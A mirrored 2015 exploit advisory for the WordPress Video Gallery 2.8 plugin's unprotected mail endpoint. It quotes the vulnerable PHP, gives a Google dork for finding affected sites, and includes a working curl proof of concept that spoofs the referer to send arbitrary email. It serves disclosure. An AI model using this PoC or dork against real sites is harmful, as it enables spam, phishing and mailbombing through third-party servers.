扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 | ###################### # Exploit Title : WordPress Video Gallery 2.8 Unprotected Mail Page # Exploit Author : Claudio Viviani # Website Author: http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive) # Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery # Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip # Dork Google: index of "contus-video-gallery" # Date : 2015-04-05 # Tested on : Windows 7 / Mozilla Firefox Linux / Mozilla Firefox ###################### # Description WordPress Video Gallery 2.8 suffers from Unprotected Mail Page. This vulnerability is exploitable to dos, phishing, mailbombing, spam... The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php) /** * Email function */ add_action( 'wp_ajax_email', 'email_function' ); add_action( 'wp_ajax_nopriv_email', 'email_function' ); function email_function() { require_once( dirname( __FILE__ ) . '/email.php' ); die(); } Any user can send email from /contus-video-gallery/email.php to any recipients. The variables used to send emails are: $to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL ); $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL ); $url= filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL ); $subject= filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING ); $message_content =filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING ); $title= filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING ); $referrer = parse_url( $_SERVER['HTTP_REFERER'] ); $referrer_host = $referrer['scheme'] . '://' . $referrer['host']; $pageURL= 'http'; It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email: if ( $referrer_host === $pageURL ) { $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; $headers .= "From: " . "<" . $from . ">\r\n"; $headers .= "Reply-To: " . $from . "\r\n"; $headers .= "Return-path: " . $from; $username = explode('@' , $from ); $username = ucfirst($username['0']); $subject=$username . ' has shared a video with you.'; $emailtemplate_path= plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html'; $message =file_get_contents( $emailtemplate_path); $message = str_replace( '{subject}', $subject, $message ); $message = str_replace( '{message}', $message_content, $message); $message = str_replace( '{videourl}',$url,$message ); $message = str_replace('{username}',$username ,$message ); if ( @mail( $to, $title, $message, $headers ) ) { echo 'success=sent'; } else { echo 'success=error'; } } else { echo 'success=error'; } The “Referer” field can easily be modified by the attacker! ###################### # PoC curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \ -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email cUrl switch "-e" spoof referer address # Http Response success=sent # Poc Video http://youtu.be/qgOGPm1-tNc ####################### Discovered By : Claudio Viviani http://www.homelab.it http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit) http://ffhd.homelab.it (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### |
体验盒子
